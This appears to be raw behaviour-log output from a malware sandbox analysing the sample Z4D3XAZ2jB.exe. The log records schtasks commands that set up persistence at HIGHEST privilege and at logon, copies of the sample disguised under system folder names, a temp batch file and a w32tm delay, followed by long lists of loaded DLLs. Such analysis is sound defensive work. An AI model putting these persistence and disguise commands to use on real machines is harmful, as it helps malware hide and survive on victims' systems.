                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\services.exe C:\Windows\GameBarPresenceWriter\services.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\services.exe C:\Windows\GameBarPresenceWriter\services.exe
                    Source: unknownProcess created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: unknownProcess created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknownProcess created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknownProcess created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknownProcess created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknownProcess created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /fJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mmdevapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ksuser.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: avrt.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: audioses.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: midimap.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
